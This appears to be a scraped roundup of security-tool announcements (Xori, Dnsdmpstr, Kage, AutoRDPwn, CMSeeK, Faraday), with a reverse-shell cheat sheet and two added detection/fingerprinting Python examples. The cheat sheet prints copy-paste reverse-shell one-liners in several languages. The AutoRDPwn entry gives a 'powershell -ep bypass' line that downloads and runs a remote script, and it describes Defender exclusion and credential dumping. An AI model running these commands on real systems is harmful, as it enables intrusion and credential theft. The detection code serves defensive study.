Xori – An Automation-Ready Disassembly And Static Analysis Library For PE32, 32+ And Shellcode

Xori is an automation-ready disassembly and static analysis library that consumes shellcode or PE binaries and provides triage analysis data.

Acknowledgements:
Xori wouldn't exist without inspiration and ideas from the open source community. We are indebted to the work of the Capstone engine and the LLVM Project.

Architectures:
- i386
- x86-64

File Formats:
- PE, PE+
- Plain shellcode

Current Features:
- Outputs JSON of the 1) disassembly, 2) functions, and 3) imports.
- Manages image and stack memory.
- 2 modes:
  - Light Emulation: meant to enumerate all paths (registers, stack, some instructions).
  - Full Emulation: only follows the code's path (slow performance).
- Simulated TEB & PEB structures.
- Evaluates functions based on DLL exports.
- Displays strings based on referenced memory locations.
- Uses FLIRT style signatures (Fast Library Identification and Recognition Technology).
- Allows you to use your own exports for simulating the PEB.
- Will detect padding after a non-returning call.
- Will try to identify function references from offsets.

What it doesn't do yet:
- The engine is interactive.
- Does not dump strings.
- Does not process non-executable sections.
- TEB and PEB are not enabled for non-PE files.
- Only some x86 instructions are emulated, not all.
- Patching and assembling.
- No plugins or scripting.

Documentation

Requirements:
rustc 1.27.0

Install rust for OSX & Linux Distros:
    curl https://sh.rustup.rs -sSf | sh

Install rust for Windows:
1. Get the rustup.exe (the rust toolchain installer) from here. This tool will install the rust compiler rustc, the rust package manager cargo and other useful tools for development in rust.
2. Run the rustup.exe.
3. Install rust prerequisites: in case you see this output, your Windows environment is missing the Build Tools for Visual Studio, so keep reading; otherwise go here.
   - Follow the link from the output, or click here.
   - Cancel the rustup-init.exe.
   - Back in the browser, scroll down, expand the tab Tools for Visual Studio 2017 & download the Build Tools for Visual Studio 2017.
   - Run the executable.
   - Choose the Visual C++ build tools & click "install", then close the "Visual Studio Installer" after the installation.
4. Install rust toolchain: run the rustup.exe & you will see the following output. After the successful installation you can see that the rust compiler rustc, rust package manager cargo and other tools were installed (under C:\Users\%username%\.cargo & C:\Users\%username%\.rustup).
5. Open a new "Command Prompt" & follow the xori build steps here.

Installation:
1. Build Xori. This command will also create other binaries such as pesymbols and peinfo.
    git clone https://github.com/endgameinc/xori.git
    cd xori
    cargo build --release
2. Create the xori.json config file:
    cp xori.json.example xori.json
    [edit if desired]
3. (Optional) Build the symbols files. If you want to create your own symbol files you need to set the dll folders to where you stored your Windows DLLs:
    "function_symbol32": "./src/analysis/symbols/generated_user_syswow64.json",
    "function_symbol64": "./src/analysis/symbols/generated_user_system32.json",
    "symbol_server": {
        "dll_folder32": "./dlls/32bit",
        "dll_folder64": "./dlls/64bit"
    }
   Run pesymbols to overwrite the function_symbol json:
    ./target/release/pesymbols

Run:
    ./target/release/xori -f test.exe

Run all tests:
    cargo test

Browser GUI:
    Chrome     Firefox    Safari     IE   Opera
    Latest ✔   Latest ✔   Latest ✔   x    Latest ✔

Requirements:
- nodejs
- yarn (optional for UI dev)
On Ubuntu 18.04 you may need to apt install the following: curl git libssl-dev pkg-config build-essential npm

Build:
    cd gui
    npm install

Run, in one terminal:
    cd gui
    node src/server.js
In another terminal:
    cd gui
    npm start
It will open your default browser to http://localhost:3000/. The backend API is listening on localhost:5000.

Download Xori

Link: http://feedproxy.google.com/~r/PentestTools/~3/4m8ecBSKkZc/xori-automation-ready-disassembly-and.html

Dnsdmpstr – Unofficial API & Client For Dnsdumpster.Com And Hackertarget.Com

Unofficial API & Client for DNS Dumpster and HackerTarget.com IP tools.
https://dnsdumpster.com/
https://hackertarget.com/ip-tools/

Installation:
    git clone https://github.com/zeropwn/dnsdmpstr
    cd dnsdmpstr
    pip3 install -r requirements.txt
    chmod +x ddump.py

Usage:
As a command-line utility:
    target="hackerone.com"
    python3 ddump.py -u $target --all

Extended usage:
    usage: ddump.py [-h] [-u U] [-a] [-r] [-d] [-dd] [--links] [--headers] [--all]

    optional arguments:
      -h, --help  show this help message and exit
      -u U        target domain
      -a          host search (DNS A Record lookup)
      -r          reverse dns lookup (accepts IP, IP range or domain name)
      -d          dns lookup
      -dd         classical dns dump format
      --links     grab page links from url
      --headers   grab http headers from url
      --all       grab all information available

As a library:
    import json
    # the module exposes a class of the same name; importing only the module
    # would leave dnsdmpstr() uncallable below
    from dnsdmpstr import dnsdmpstr

    target = "hackerone.com"
    dnsdump = dnsdmpstr()
    print(json.dumps(dnsdump.dump(target), indent=1))
    print(dnsdump.hostsearch(target))
    print(dnsdump.reversedns(target))
    print(dnsdump.dnslookup(target))
    print(dnsdump.pagelinks(target))
    print(dnsdump.httpheaders(target))

Download Dnsdmpstr

Link: http://feedproxy.google.com/~r/PentestTools/~3/cJrHa_dhIkQ/dnsdmpstr-unofficial-api-client-for.html

Hashboy-Tool – A Hash Query Tool

Hashboy was redeveloped on hash-buster.
Author: Leiothrix

How to install:
    $ git clone https://github.com/sf197/hashboy-tool
    $ cd hashboy-tool
    $ python3 hashboy.py

How to use:
    $ python3 hashboy.py
    [ASCII banner]
    Author:Leiothrix Github:https://github.com/sf197
    usage: hashboy.py [-h] [-s HASH] [-f FILE] [-t THREADS]

    optional arguments:
      -h, --help            show this help message and exit
      -s HASH, --hash HASH  hash
      -f FILE, --file FILE  file containing hashes
      -t THREADS, --threads THREADS
                            number of threads

Download Hashboy-Tool

Link: http://feedproxy.google.com/~r/PentestTools/~3/WF_Ut4LqVas/hashboy-tool-hash-query-tool.html

Kage – Graphical User Interface For Metasploit Meterpreter And Session Handler

Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.
For now it only supports windows/meterpreter & android/meterpreter.

Getting Started:
Please follow these instructions to get a copy of Kage running on your local machine without any problems.

Prerequisites:
Metasploit-framework must be installed and in your PATH:
- Msfrpcd
- Msfvenom
- Msfdb

Installing:
You can install Kage binaries from here.

For developers, to run the app from source code:
    # Download source code
    git clone https://github.com/WayzDev/Kage.git
    # Install dependencies and run kage
    cd Kage
    yarn # or npm install
    yarn run dev # or npm run dev
    # to build project
    yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

Contact:
Twitter: @iFalah
Email: ifalah@protonmail.com

Credits:
- Metasploit Framework – (c) Rapid7 Inc. 2012 (BSD License) http://www.metasploit.com/
- node-msfrpcd – (c) Tomas Gonzalez Vivo. 2017 (Apache License) https://github.com/tomasgvivo/node-msfrpc
- electron-vue – (c) Greg Holguin. 2016 (MIT) https://github.com/SimulatedGREG/electron-vue

This project was generated with electron-vue@8fae476 using vue-cli. Documentation about the original structure can be found here.

Download Kage

Link: http://feedproxy.google.com/~r/PentestTools/~3/tRooyJ9gO2o/kage-graphical-user-interface-for.html

Reverse Shell Cheat Sheet

If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you'll probably want an interactive shell.

If it's not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP port. This page deals with the former.

Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you're suitably well prepared.

The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you substitute "/bin/sh -i" with "cmd.exe".

Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they're quite short lines, but not very readable.

PHP:
    php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python:
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash:
    bash -i >& /dev/tcp/192.168.0.5/4444 0>&1

Netcat:
    nc -e /bin/sh 192.168.0.5 4444

Perl:
    perl -e 'use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby:
    ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java:
    r = Runtime.getRuntime()
    p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
    p.waitFor()

xterm:
    xterm -display 192.168.0.5:4444

Source: Reverse-Shell-Cheatsheet
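The one-liners above share a few recognizable shapes (a socket or /dev/tcp redirection joined to an interactive shell, file-descriptor duplication, or a remote X display), which is what a defender can alert on. The Python below is an added example and not part of the original cheat sheet: it flags those shapes in process command lines such as auditd EXECVE records; the rule names and sample records are constructed.

```python
"""Flag the reverse-shell one-liner shapes from the cheat sheet in process
command lines (auditd EXECVE records, EDR process events, shell history).
Added defender-side example; rule names and sample records are constructed."""
import re

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"

# Each rule is (name, regex over the full command line). The patterns mirror
# the cheat-sheet entries: a socket or /dev/tcp redirection joined to an
# interactive shell, fd duplication, or a remote X display.
RULES = [
    ("bash_dev_tcp",     re.compile(r"/dev/tcp/" + IPV4 + r"/\d+")),
    ("netcat_exec",      re.compile(r"\bnc(?:at)?\b.*\s-e\s+/bin/(?:ba)?sh\b")),
    ("php_fsockopen",    re.compile(r"php\s+-r\s+.*fsockopen\(.*exec\(")),
    ("python_dup2",      re.compile(r"python\S*\s+-c\s+.*\.connect\(.*os\.dup2")),
    ("perl_socket_exec", re.compile(r"perl\s+-e\s+.*\bSocket\b.*exec\(")),
    ("ruby_tcpsocket",   re.compile(r"ruby\s+.*TCPSocket\.open.*\bexec\b")),
    ("xterm_display",    re.compile(r"xterm\s+-display\s+" + IPV4 + r":\d+")),
]

def classify(cmdline):
    """Names of all rules that match one command line (empty if benign)."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(records):
    """(rule, cmdline) for every matching record, in input order."""
    return [(name, line) for line in records for name in classify(line)]

# Constructed sample: one benign command, the rest mirror the sheet above.
SAMPLE = [
    "cat /etc/hosts",
    "bash -i >& /dev/tcp/192.168.0.5/4444 0>&1",
    "nc -e /bin/sh 192.168.0.5 4444",
    "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,"
    "socket.SOCK_STREAM);s.connect((\"192.168.0.5\",4444));os.dup2(s.fileno(),0);"
    "p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "xterm -display 192.168.0.5:4444",
    "ruby -rsocket -e'f=TCPSocket.open(\"192.168.0.5\",4444).to_i;"
    "exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'",
]

if __name__ == "__main__":
    for name, line in scan(SAMPLE):
        print(f"{name:18} {line[:70]}")
```

The regexes deliberately require two of the ingredients together (socket plus shell, or /dev/tcp plus a port), so ordinary `nc` port checks or `python -c` one-liners without `dup2` do not fire.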

Link: http://feedproxy.google.com/~r/PentestTools/~3/Ygxu7rgH7jo/reverse-shell-cheat-sheet.html

AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view the victim's desktop without their consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements:
Powershell 4.0 or higher

Changes in version 4.8:
• Compatibility with Powershell 4.0
• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)
• Automatic exclusion in Windows Defender (4 different methods)
• Remote execution without password for PSexec, WMI and Invoke-Command
• New available attack: DCOM Passwordless Execution
• New available module: Remote Access / Metasploit Web Delivery
• New module available: Remote VNC Server (designed for legacy environments)
• Autocomplete the host, user and password fields by pressing Enter
• It is now possible to run the tool without administrator privileges with the -noadmin parameter
* The rest of the changes can be consulted in the CHANGELOG file

Use:
This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.

One line execution:
    powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Credits and Acknowledgments:
• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• HarmJ0y & Matt Graeber for their script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
• Stas'M Corp. for its tool RDP Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact:
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net

Download AutoRDPwn

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html

CMSeeK v1.1.1 – CMS Detection And Exploitation Suite (Scan WordPress, Joomla, Drupal And 150 Other CMSs)

What is a CMS?
A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some notable examples are WordPress, Joomla, Drupal, etc.

Release History:
- Version 1.1.1 [01-02-2019]
- Version 1.1.0 [28-08-2018]
- Version 1.0.9 [21-08-2018]
- Version 1.0.8 [14-08-2018]
- Version 1.0.7 [07-08-2018]
…
Changelog File

Functions Of CMSeeK:
- Basic CMS Detection of over 155 CMS
- Drupal version detection
- Advanced WordPress Scans
  - Detects Version
  - User Enumeration
  - Plugins Enumeration
  - Theme Enumeration
  - Detects Users (3 Detection Methods)
  - Looks for Version Vulnerabilities and much more!
- Advanced Joomla Scans
  - Version detection
  - Backup files finder
  - Admin page finder
  - Core vulnerability detection
  - Directory listing check
  - Config leak detection
  - Various other checks
- Modular bruteforce system
  - Use pre made bruteforce modules or create your own and integrate with it

Requirements and Compatibility:
CMSeeK is built using python3; you will need python3 to run this tool, and it is compatible with unix based systems as of now. Windows support will be added later. CMSeeK relies on git for auto-update, so make sure git is installed.

Installation and Usage:
It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands:
    git clone https://github.com/Tuhinshubhra/CMSeeK
    cd CMSeeK
    pip/pip3 install -r requirements.txt

For guided scanning:
    python3 cmseek.py
Else:
    python3 cmseek.py -u […]

Help menu from the program:
    USAGE: python3 cmseek.py (for a guided scanning) OR python3 cmseek.py [OPTIONS] <Target Specification>

    SPECIFING TARGET:
      -u URL, --url URL          Target Url
      -l LIST, -list LIST        path of the file containing list of sites for multi-site scan (comma separated)

    RE-DIRECT:
      --follow-redirect          Follows all/any redirect(s)
      --no-redirect              Skips all redirects and tests the input target(s)

    USER AGENT:
      -r, --random-agent         Use a random user agent
      --googlebot                Use Google bot user agent
      --user-agent USER_AGENT    Specify a custom user agent

    OUTPUT:
      -v, --verbose              Increase output verbosity

    VERSION & UPDATING:
      --update                   Update CMSeeK (Requires git)
      --version                  Show CMSeeK version and exit

    HELP & MISCELLANEOUS:
      -h, --help                 Show this help message and exit
      --clear-result             Delete all the scan result

    EXAMPLE USAGE:
      python3 cmseek.py -u example.com                           # Scan example.com
      python3 cmseek.py -l /home/user/target.txt                 # Scan the sites specified in target.txt (comma separated)
      python3 cmseek.py -u example.com --user-agent Mozilla 5.0  # Scan example.com using custom user-Agent Mozilla is 5.0 used here
      python3 cmseek.py -u example.com --random-agent            # Scan example.com using a random user-Agent
      python3 cmseek.py -v -u example.com                        # enabling verbose output while scanning example.com

Checking For Update:
You can check for update either from the main menu or use python3 cmseek.py --update to check for update and apply auto update.
P.S: Please make sure you have git installed, CMSeeK uses git to apply auto update.

Detection Methods:
CMSeek detects CMS via the following:
- HTTP Headers
- Generator meta tag
- Page source code
- robots.txt

Supported CMSs:
CMSeeK currently can detect 157 CMS. Check the list here: cmss.py file which is present in the cmseekdb directory. All the cmss are stored in the following way:
    cmsID = {
        'name': 'Name Of CMS',
        'url': 'Official URL of the CMS',
        'vd': 'Version Detection (0 for no, 1 for yes)',
        'deeps': 'Deep Scan (0 for no 1 for yes)'
    }

Scan Result:
All of your scan results are stored in a json file named cms.json; you can find the logs inside the Result\<Target Site> directory, and as for the bruteforce results, they're stored in a txt file under the site's result directory as well.
Here is an example of the json report log: (screenshot)

Bruteforce Modules:
CMSeek has a modular bruteforce system, meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly, but in case you already figured out how to (pretty easy once you analyze the pre-made modules), all you need to do is this:
1. Add a comment exactly like this: # <Name Of The CMS> Bruteforce module. This will help CMSeeK to know the name of the CMS using regex.
2. Add another comment: ### cmseekbruteforcemodule, this will help CMSeeK to know it is a module.
3. Copy and paste the module in the brutecms directory under CMSeeK's directory.
4. Open CMSeeK and Rebuild Cache using U as the input in the first menu.
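To see what the four detection methods listed above (HTTP headers, generator meta tag, page source, robots.txt) reveal about a site you administer, the Python below reproduces a passive check against a captured response and shows how much evidence remains once the generator tag is removed. This is an added example, not CMSeeK's code; the signature table, header names and sample response are constructed for illustration.

```python
"""Passive CMS fingerprint self-check over the evidence sources CMSeeK lists:
HTTP headers, generator meta tag, page source paths and robots.txt.
Added example, not CMSeeK's own code; signatures and response are constructed."""
import re

# Constructed signature table: header needles (lower-case), body path
# fragments and robots.txt entries that commonly identify each product.
SIGNATURES = {
    "WordPress": {"paths": ["/wp-content/", "/wp-includes/"],
                  "robots": ["/wp-admin/"],
                  "headers": {"link": "api.w.org"}},
    "Joomla":    {"paths": ["/media/jui/", "/components/com_"],
                  "robots": ["/administrator/"],
                  "headers": {}},
    "Drupal":    {"paths": ["/sites/default/files/", "/core/misc/drupal.js"],
                  "robots": ["/core/"],
                  # empty needle: the header's mere presence is the tell
                  "headers": {"x-generator": "drupal", "x-drupal-cache": ""}},
}
GENERATOR_RE = re.compile(
    r'<meta\s+name=["\']generator["\']\s+content=["\']([^"\']+)["\']', re.I)

def fingerprint(headers, body, robots=""):
    """Return {cms_name: [evidence strings]} for everything the site leaks."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    found = {}
    m = GENERATOR_RE.search(body)
    if m:  # the generator tag names the product directly, often with version
        product = m.group(1).split()[0]
        found.setdefault(product, []).append(f"generator meta tag: {m.group(1)}")
    for cms, sig in SIGNATURES.items():
        ev = [f"path in page source: {p}" for p in sig["paths"] if p in body]
        ev += [f"robots.txt entry: {r}" for r in sig["robots"] if r in robots]
        for name, needle in sig["headers"].items():
            if name in hdrs and needle in hdrs[name].lower():
                ev.append(f"header {name}: {hdrs[name]}")
        if ev:
            found.setdefault(cms, []).extend(ev)
    return found

def disclosed_version(body):
    """Version string carried by the generator tag, or None if not disclosed."""
    m = GENERATOR_RE.search(body)
    parts = m.group(1).split() if m else []
    return parts[1] if len(parts) > 1 else None

# Constructed response for a WordPress site, and the same page with the
# generator tag stripped (the cheapest hardening step; paths still leak).
HEADERS = {"Server": "nginx",
           "Link": '<https://example.test/wp-json/>; rel="https://api.w.org/"'}
BODY = ('<html><head><meta name="generator" content="WordPress 5.0" />'
        '<link rel="stylesheet" href="/wp-content/themes/t/style.css"></head>'
        '<body><script src="/wp-includes/js/jquery.js"></script></body></html>')
ROBOTS = "User-agent: *\nDisallow: /wp-admin/\n"
HARDENED_BODY = GENERATOR_RE.sub("", BODY)

if __name__ == "__main__":
    for cms, evidence in fingerprint(HEADERS, BODY, ROBOTS).items():
        print(cms, "version", disclosed_version(BODY), *evidence, sep="\n  ")
    print("after stripping generator tag:",
          len(fingerprint(HEADERS, HARDENED_BODY, ROBOTS)["WordPress"]), "hints remain")
```

Removing the generator tag hides the version but not the product: the asset paths, the robots.txt entry and the Link header still identify WordPress, which is why version-scoped checks in CMSeeK depend on the tag while basic detection does not.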
If everything is done right you'll see something like this (refer to screenshot below) and your module will be listed in the bruteforce menu the next time you open CMSeeK.

Need More Reasons To Use CMSeeK?
If not anything you can always enjoy exiting CMSeeK (please don't), it will bid you goodbye in a random goodbye message in various languages.
Also you can try reading comments in the code, those are pretty random and weird!!!

Screenshots: Main Menu, Scan Result, WordPress Scan Result

Guidelines for opening an issue:
Please make sure you have the following info attached when opening a new issue:
- Target
- Exact copy of error or screenshot of error
- Your operating system and python version
Issues without this information might not be answered!

Follow @r3dhax0r: Twitter
Team: Virtually Unvoid Defensive (VUD)

Download CMSeeK v1.1.1

Link: http://feedproxy.google.com/~r/PentestTools/~3/8EDnhSxC2Hw/cmseek-v111-cms-detection-and.html

Faraday v3.6 – Collaborative Penetration Test and Vulnerability Management Platform

Here are the main new features and improvements in Faraday v3.6:

Welcome Service Now
A new way to send vulnerabilities is available! We integrated Faraday with Service Now, giving you more options to work with.

Burp plugin was totally revamped
We have been working hard to make several changes to enhance your daily workflow:
- Burp plugin that uses the Faraday server API, so you don't have to use the GTK client
- The plugin was rewritten in Java
- We added 2FA support to increase security

We empowered Jira integration
Can you imagine sending multiple vulns to Jira without filling the form out every time? With Faraday v3.6 now you can! With this integration, you don't have to connect your Jira credentials every time you use it, just do it once and you're ready to go. You also have the option to override default settings and switch projects or username. Jira is one of our most important integrations and we want to help you to get the most out of it.

Learn more about your vulns to mitigate them better
In this new version, we added more fields to enrich the Vulnerability Templates, hopefully improving an important part of your daily workflow. This new feature allows you to have all the data you need in one place.
Added fields: 'impact', 'easeofresolution', 'policyviolations'

Other plugins updated in this version:
- Netsparker
- SQLMap
- Dnsmap
- SSLyze
- Nessus
- Goohost

Download Faraday v3.6

Link: http://feedproxy.google.com/~r/PentestTools/~3/xuC5gpNVqec/faraday-v36-collaborative-penetration.html